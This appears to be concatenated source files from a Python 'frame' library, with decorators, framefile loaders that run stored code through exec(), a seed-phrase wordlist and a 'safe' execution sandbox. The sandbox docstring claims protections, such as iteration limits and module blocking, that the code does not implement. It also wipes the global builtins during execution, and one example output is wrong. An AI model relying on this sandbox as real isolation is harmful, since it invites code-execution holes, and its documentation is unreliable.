# geting frame object from decorator
res_frame = fGet('frame', fSys.framers['temp']) 
print(test(), res_frame)
# geting result variable from decorator
print(fGet('res', res_frame))
# or just
# print(framing_result(res_frame, test))
```
Output:
```
test
10 <frame.op.Framer object at 0x10ddf3d10>
10
```
#### Second code example: 
```
ctx = Frame()
@framing(ctx(), return_frame=True)
def test():
    print('test')
    return 10
print(framing_result(ctx, test))
```
Output:
```
test
10
```
    '''
    if framer == 'new': framer_obj = Framer()
    elif isinstance(framer, Frame): framer_obj = framer()
    else: framer_obj = framer
    def decorator(func):
        def wrapper(*args, **kwargs):
            res = func(*args, **kwargs)
            fVar(name_of_result_variable, res, framer=framer_obj)
            return res
        return wrapper
    if return_frame: fVar('frame', framer_obj, to_repr=False, framer=fSys.framers['temp'])
    return decorator


    
def framing_result(
        framer: Framer, 
        func: object, 
        name_of_result_variable: str = 'res', 
        *func_args, **func_kwargs
        ):
    '''
## Getting result from [@framing def ...] function
### Args:
- framer: object[Frame] -  framer to run.
- func: object - function for runing.
- name_of_result_variable: str - name_of_result_variable from decorator @framing.
- *args & **kwargs - arguments for [func] running.
### Example:
change 
```
# geting frame object from decorator
res_frame = fGet('frame', fSys.framers['temp'])
# runing 
print(test(), res_frame)
# geting result variable from decorator
print(fGet('res', res_frame))
```
to just
```
print(framing_result(fGet('frame', fSys.framers['temp']), test, 'res'))
```
    '''
    if isinstance(framer, Frame): framer = framer.framer
    resf = func(*func_args, **func_kwargs)
    resg = fGet(name_of_result_variable, framer)
    if resf != resg: raise FramingError(f'Variable [{name_of_result_variable}] is not found in Frame[{framer}].')
    return resg

def open_and_run(
        filename: str = 'ctx.json', 
        format: str = 'json', 
        outout_var: str = 'res',
        returning_format: str = 'result', 
        exec_method: str = 'basic'
        ) -> any | Frame:
    '''
## Run framefile method
Open frame file and start then.

### Args:
- {filename}: str - filename of framefile
- {format}: str - framefile open format
- {output_var}: str - name of var to output
- {returning_format}: str[result/frame] - if 'result', method returning value of {output_var}, else returning frame
- {exec_method}: str[basic/safe] - method to execute framefile
    '''
    if returning_format == 'result':
        with Frame().load(filename, format) as f: 
            code = f.compile()
            res = exec_and_return(code, outout_var) if exec_method == 'basic' else exec_and_return_safe(code, outout_var)
    else: res = Frame().load(filename, format)
    return res

def save_code_to_bin(
        filename: str = 'ctx.json', 
        output_file: str = 'bin.py',
        format: str = 'json'
        ):
    '''
## Compile framefile method
Open framefile and save code to {output_file} bin python file.

### Args: 
- {filename}: str - name of file
- {output_file}: str - name of output file
- {format}: str - open format of framefile (json/pickle)
'''
    opened = open_and_run(filename, format, returning_format='frame')
    code = opened.compile()
    with open(output_file, 'w') as file: file.write(code)
    return code


def FastGet(
        frame: Frame, 
        output_name
        ):
    '''
## Unsafe method for get variavle
Simple fast method to get variable.

### Args: 
- {frame}: Frame - variable frame
- {output_name} - variable name
    '''
    return exec_and_return(frame.compile(), output_name, locals(), globals())

from .plugins_system import (PluginBase, PluginRegistry, register_plugin)
from .plugins import (MathPlugin)


wordlist = '''abandon ability able about above absent absorb abstract absurd abuse access accident account accuse achieve acid acoustic acquire across act action
actor actress actual adapt add addict address adjust admit adult advance advice aerobic affair afford afraid again age agent agree ahead aim air airport
aisle alarm album alcohol alert alien all alley allow almost alone alpha already also alter always amateur amazing among amount amused analyst anchor
ancient anger angle angry animal ankle announce annual another answer antenna antique anxiety any apart apology appear apple approve april arch
arctic area arena argue arm armed armor army around arrange arrest arrive arrow art artefact artist artwork ask aspect assault asset assist assume
asthma athlete atom attack attend attitude attract auction audit august aunt author auto autumn average avocado avoid awake aware away awesome
awful awkward axis baby bachelor bacon badge bag balance balcony ball bamboo banana banner bar barely bargain barrel base basic basket battle
beach bean beauty because become beef before begin behave behind believe below belt bench benefit best betray better between beyond bicycle bid
bike bind biology bird birth bitter black blade blame blanket blast bleak bless blind blood blossom blouse blue blur blush board boat body boil bomb
bone bonus book boost border boring borrow boss bottom bounce box boy bracket brain brand brass brave bread breeze brick bridge brief bright bring
brisk broccoli broken bronze broom brother brown brush bubble buddy budget buffalo build bulb bulk bullet bundle bunker burden burger burst bus
business busy butter buyer buzz cabbage cabin cable cactus cage cake call calm camera camp can canal cancel candy cannon canoe canvas canyon
capable capital captain car carbon card cargo carpet carry cart case cash casino castle casual cat catalog catch category cattle caught cause caution
cave ceiling celery cement census century cereal certain chair chalk champion change chaos chapter charge chase chat cheap check cheese chef cherry
chest chicken chief child chimney choice choose chronic chuckle chunk churn cigar cinnamon circle citizen city civil claim clap clarify claw clay clean clerk
clever click client cliff climb clinic clip clock clog close cloth cloud clown club clump cluster clutch coach coast coconut code coffee coil coin collect color
column combine come comfort comic common company concert conduct confirm congress connect consider control convince cook cool copper copy coral
core corn correct cost cotton couch country couple course cousin cover coyote crack cradle craft cram crane crash crater crawl crazy cream credit creek
crew cricket crime crisp critic crop cross crouch crowd crucial cruel cruise crumble crunch crush cry crystal cube culture cup cupboard curious current
curtain curve cushion custom cute cycle dad damage damp dance danger daring dash daughter dawn day deal debate debris decade december decide
decline decorate decrease deer defense define defy degree delay deliver demand demise denial dentist deny depart depend deposit depth deputy derive
describe desert design desk despair destroy detail detect develop device devote diagram dial diamond diary dice diesel diet differ digital dignity dilemma
dinner dinosaur direct dirt disagree discover disease dish dismiss disorder display distance divert divide divorce dizzy doctor document dog doll dolphin
domain donate donkey donor door dose double dove draft dragon drama drastic draw dream dress drift drill drink drip drive drop drum dry duck dumb
dune during dust dutch duty dwarf dynamic eager eagle early earn earth easily east easy echo ecology economy edge edit educate effort egg eight
either elbow elder electric elegant element elephant elevator elite else embark embody embrace emerge emotion employ empower empty enable enact
end endless endorse enemy energy enforce engage engine enhance enjoy enlist enough enrich enroll ensure enter entire entry envelope episode equal
equip era erase erode erosion error erupt escape essay essence estate eternal ethics evidence evil evoke evolve exact example excess exchange excite
exclude excuse execute exercise exhaust exhibit exile exist exit exotic expand expect expire explain expose express extend extra eye eyebrow fabric face
faculty fade faint faith fall false fame family famous fan fancy fantasy farm fashion fat fatal father fatigue fault favorite feature february federal fee
feed feel female fence festival fetch fever few fiber fiction field figure file film filter final find fine finger finish fire firm first fiscal fish fit fitness fix flag
flame flash flat flavor flee flight flip float flock floor flower fluid flush fly foam focus fog foil fold follow food foot force forest forget fork fortune forum
forward fossil foster found fox fragile frame frequent fresh friend fringe frog front frost frown frozen fruit fuel fun funny furnace fury future gadget gain
galaxy gallery game gap garage garbage garden garlic garment gas gasp gate gather gauge gaze general genius genre gentle genuine gesture ghost
giant gift giggle ginger giraffe girl give glad glance glare glass glide glimpse globe gloom glory glove glow glue goat goddess gold good goose gorilla
gospel gossip govern gown grab grace grain grant grape grass gravity great green grid grief grit grocery group grow grunt guard guess guide guilt
guitar gun gym habit hair half hammer hamster hand happy harbor hard harsh harvest hat have hawk hazard head health heart heavy hedgehog height
hello helmet help hen hero hidden high hill hint hip hire history hobby hockey hold hole holiday hollow home honey hood hope horn horror horse hospital
host hotel hour hover hub huge human humble humor hundred hungry hunt hurdle hurry hurt husband hybrid ice icon idea identify idle ignore ill illegal
illness image imitate immense immune impact impose improve impulse inch include income increase index indicate indoor industry infant inflict inform
inhale inherit initial inject injury inmate inner innocent input inquiry insane insect inside inspire install intact interest into invest invite involve iron island
isolate issue item ivory jacket jaguar jar jazz jealous jeans jelly jewel job join joke journey joy judge juice jump jungle junior junk just kangaroo keen
keep ketchup key kick kid kidney kind kingdom kiss kit kitchen kite kitten kiwi knee knife knock know lab label labor ladder lady lake lamp language
laptop large later latin laugh laundry lava law lawn lawsuit layer lazy leader leaf learn leave lecture left leg legal legend leisure lemon lend length lens
leopard lesson letter level liar liberty library license life lift light like limb limit link lion liquid list little live lizard load loan lobster local lock logic lonely
long loop lottery loud lounge love loyal lucky luggage lumber lunar lunch luxury lyrics machine mad magic magnet maid mail main major make mammal
man manage mandate mango mansion manual maple marble march margin marine market marriage mask mass master match material math matrix
matter maximum maze meadow mean measure meat mechanic medal media melody melt member memory mention menu mercy merge merit merry mesh
message metal method middle midnight milk million mimic mind minimum minor minute miracle mirror misery miss mistake mix mixed mixture mobile
model modify mom moment monitor monkey monster month moon moral more morning mosquito mother motion motor mountain mouse move movie
much muffin mule multiply muscle museum mushroom music must mutual myself mystery myth naive name napkin narrow nasty nation nature near neck
need negative neglect neither nephew nerve nest net network neutral never news next nice night noble noise nominee noodle normal north nose notable
note nothing notice novel now nuclear number nurse nut oak obey object oblige obscure observe obtain obvious occur ocean october odor off offer office
often oil okay old olive olympic omit once one onion online only open opera opinion oppose option orange orbit orchard order ordinary organ orient
original orphan ostrich other outdoor outer output outside oval oven over own owner oxygen oyster ozone pact paddle page pair palace palm panda
panel panic panther paper parade parent park parrot party pass patch path patient patrol pattern pause pave payment peace peanut pear peasant pelican
pen penalty pencil people pepper perfect permit person pet phone photo phrase physical piano picnic picture piece pig pigeon pill pilot pink pioneer pipe
pistol pitch pizza place planet plastic plate play please pledge pluck plug plunge poem poet point polar pole police pond pony pool popular portion
position possible post potato pottery poverty powder power practice praise predict prefer prepare present pretty prevent price pride primary print
priority prison private prize problem process produce profit program project promote proof property prosper protect proud provide public pudding pull
pulp pulse pumpkin punch pupil puppy purchase purity purpose purse push put puzzle pyramid quality quantum quarter question quick quit quiz quote
rabbit raccoon race rack radar radio rail rain raise rally ramp ranch random range rapid rare rate rather raven raw razor ready real reason rebel
rebuild recall receive recipe record recycle reduce reflect reform refuse region regret regular reject relax release relief rely remain remember remind
remove render renew rent reopen repair repeat replace report require rescue resemble resist resource response result retire retreat return reunion
reveal review reward rhythm rib ribbon rice rich ride ridge rifle right rigid ring riot ripple risk ritual rival river road roast robot robust rocket romance
roof rookie room rose rotate rough round route royal rubber rude rug rule run runway rural sad saddle sadness safe sail salad salmon salon salt salute
same sample sand satisfy satoshi sauce sausage save say scale scan scare scatter scene scheme school science scissors scorpion scout scrap screen
script scrub sea search season seat second secret section security seed seek segment select sell seminar senior sense sentence series service session
settle setup seven shadow shaft shallow share shed shell sheriff shield shift shine ship shiver shock shoe shoot shop short shoulder shove shrimp shrug
shuffle shy sibling sick side siege sight sign silent silk silly silver similar simple since sing siren sister situate six size skate sketch ski skill skin skirt
skull slab slam sleep slender slice slide slight slim slogan slot slow slush small smart smile smoke smooth snack snake snap sniff snow soap soccer
social sock soda soft solar soldier solid solution solve someone song soon sorry sort soul sound soup source south space spare spatial spawn speak
special speed spell spend sphere spice spider spike spin spirit split spoil sponsor spoon sport spot spray spread spring spy square squeeze squirrel
stable stadium staff stage stairs stamp stand start state stay steak steel stem step stereo stick still sting stock stomach stone stool story stove
strategy street strike strong struggle student stuff stumble style subject submit subway success such sudden suffer sugar suggest suit summer sun
sunny sunset super supply supreme sure surface surge surprise surround survey suspect sustain swallow swamp swap swarm swear sweet swift swim
swing switch sword symbol symptom syrup system table tackle tag tail talent talk tank tape target task taste tattoo taxi teach team tell ten tenant
tennis tent term test text thank that theme then theory there they thing this thought three thrive throw thumb thunder ticket tide tiger tilt timber time
tiny tip tired tissue title toast tobacco today toddler toe together toilet token tomato tomorrow tone tongue tonight tool tooth top topic topple torch
tornado tortoise toss total tourist toward tower town toy track trade traffic tragic train transfer trap trash travel tray treat tree trend trial tribe trick
trigger trim trip trophy trouble truck true truly trumpet trust truth try tube tuition tumble tuna tunnel turkey turn turtle twelve twenty twice twin twist
two type typical ugly umbrella unable unaware uncle uncover under undo unfair unfold unhappy uniform unique unit universe unknown unlock until
unusual unveil update upgrade uphold upon upper upset urban urge usage use used useful useless usual utility vacant vacuum vague valid valley valve
van vanish vapor various vast vault vehicle velvet vendor venture venue verb verify version very vessel veteran viable vibrant vicious victory video view
village vintage violin virtual virus visa visit visual vital vivid vocal voice void volcano volume vote voyage wage wagon wait walk wall walnut want
warfare warm warrior wash wasp waste water wave way wealth weapon wear weasel weather web wedding weekend weird welcome west wet whale
what wheat wheel when where whip whisper wide width wife wild will win window wine wing wink winner winter wire wisdom wise wish witness wolf
woman wonder wood wool word work world worry worth wrap wreck wrestle wrist write wrong yard year yellow you young youth zebra zero zone zoo'''.replace('\n', '').split(' ')


import builtins
import sys
from abc import ABC
try:
    import resource
    resource_available = True
except:
    resource = ABC()
    resource_available = False
from collections.abc import Mapping



def str_to_int(string: str, summing: bool = True) -> list | int:
    '''
# String to integrear method
Convert any value to int (list or number).
### Args:
- {string}: str - any string for convertation.
- {summing}: bool - function will return sum of list[indexes] if true, else list[indexes]
### Example:
Code:
```
print(str_to_int('test'))
print(str_to_int('test', summing = False))
```
Output:
```
169
[41, 39, 48, 41]
```
'''
    string = str(string)
    alphabet = list('1234567890 ' +
                    'QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm' +
                    'ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЁЯЧСМИТЬБЮйцукенгшщзхъфывапролджэёячсмитьбю' +
                    '!@#$%^&*()_+¡™£¢∞§¶•ªº–≠[]{}\\|/?.,<>\'":;±§`~\n\t')
    res = []
    for i in list(string):
        if i in alphabet: res.append(alphabet.index(i))
        else: 
            alphabet.append(i)
            res.append(alphabet.index(i))
    return sum(res) if summing else res


def exec_and_return_safe(code: str, variable_name: str):
    '''
# Exec and return: safe version
Execute code and return result of specified variable.
### Args:
- code: str - Full Python code to execute
- variable_name: str - Name of variable to return

### Usage:
```
simple_code = """
x = 10
y = 34
res = x + y
"""
print('result:', exec_and_return_safe(simple_code, 'res'))
```

### Security Features:
1. Restricted builtins (no file operations, network, imports)
2. Limited execution time
3. Memory limits
4. Restricted loop iterations
5. No access to dangerous modules
    '''

    # Safe builtins whitelist
    SAFE_BUILTINS = {
        'abs', 'all', 'any', 'bool', 'chr', 'dict', 'dir', 'enumerate',
        'filter', 'float', 'int', 'len', 'list', 'map', 'max', 'min',
        'ord', 'pow', 'range', 'round', 'set', 'sorted', 'str', 'sum',
        'tuple', 'zip', 'print'
    }

    class SafeGlobals(Mapping):
        def __init__(self):
            self._builtins = {
                name: getattr(builtins, name)
                for name in SAFE_BUILTINS
                if hasattr(builtins, name)
            }
        
        def __getitem__(self, key):
            if key in self._builtins:
                return self._builtins[key]
            raise KeyError(f"Access to '{key}' is restricted")
        
        def __iter__(self):
            return iter(self._builtins)
        
        def __len__(self):
            return len(self._builtins)

    def set_limits():
        if resource_available:
            # Set memory limit (50 MB)
            resource.setrlimit(
                resource.RLIMIT_AS,
                (50 * 1024 * 1024, 50 * 1024 * 1024)
            )
            # Set CPU time limit (5 seconds)
            resource.setrlimit(
                resource.RLIMIT_CPU,
                (5, 5)
            )

    def safe_exec(code, globals_dict):
        # Replace dangerous builtins
        original_builtins = builtins.__dict__.copy()
        builtins.__dict__.clear()
        builtins.__dict__.update(globals_dict['__builtins__'])
        
        try:
            # Monitor execution
            exec(code, globals_dict)
        finally:
            # Restore original builtins
            builtins.__dict__.update(original_builtins)

    safe_globals = SafeGlobals()
    local_namespace = {
        '__builtins__': safe_globals,
        'sys': None,  # Block sys module
        'os': None,   # Block os module
        'open': None, # Block file operations
    }

    try:
        # Set resource limits
        set_limits()
    except (ValueError, resource.error):
        pass  # Ignore limits on Windows

    try:
        safe_exec(code, local_namespace)
        return local_namespace.get(variable_name)
    except MemoryError:
        print("Error: Code exceeded memory limits")
        return None
    except Exception as e:
        print(f"Error in code execution: {e}")
        return None

def exec_and_return(code: str, 
                    variable_name: str, 
                    local: dict[str, any] = {},
                    globals: dict[str, any] = globals(),
                    mode: str = 'var'):
    '''
# Exec and return
Execute code and return result of {variable name}.
### Args:

- {code}: str - full code.
- {variable_name}: str - name of vatiable to return.
- {local}: dict - dictionary to executing.
- {mode}: str - var/res - function will be returning result of execution if res, else value from {variable_name}.

### Uasge:
Code:
```
simple_code = """
x = 10
y = 34
res = x + y
"""
print('result:', exec_and_return(simple_code, 'res'))
```
Output:
```
result: 34
```
    '''
    try:
        non_locals = local
        compiled = compile(code, '__tmp', 'exec')
        res = exec(compiled, globals, non_locals)
        return res if mode == 'res' else non_locals.get(variable_name)
    except Exception as e:
        print(f"Error in code running: {e}")
        return None

def has_module(module_name: str):
    'check module installation'
    try: __import__(module_name); return True
    except ImportError: return False


'''# Cythonlib
Cython fast compilator.
Functions - 
    - cython: run cython code
    - runfile: fun .pyx file
    - setupfile: setup .pyx file to system like a lib.'''

from cythonlib.cython import (
    cython, 
    runfile, 
    setupfile, 
    CythonCompilationError, 
    CythonImportError, 
    CythonRuntimeError
)


from .nets_core import *
from .frame_core import *


@register_plugin('nets')
class NetsPlugin(PluginBase):
    '''Nets plugin.'''
    _dependencies = ['frame']
    def __init__(self, frame = None):
        super().__init__(frame)
        self._state = {'included': False, 'safemode': self.frame._get_safemode()}
        self._version = 'v0.1.1'
        self._counter = 0
    def include(self):
        super().include()
        return self
    def work(self):
        return f'netsplugin <{self._version}>'
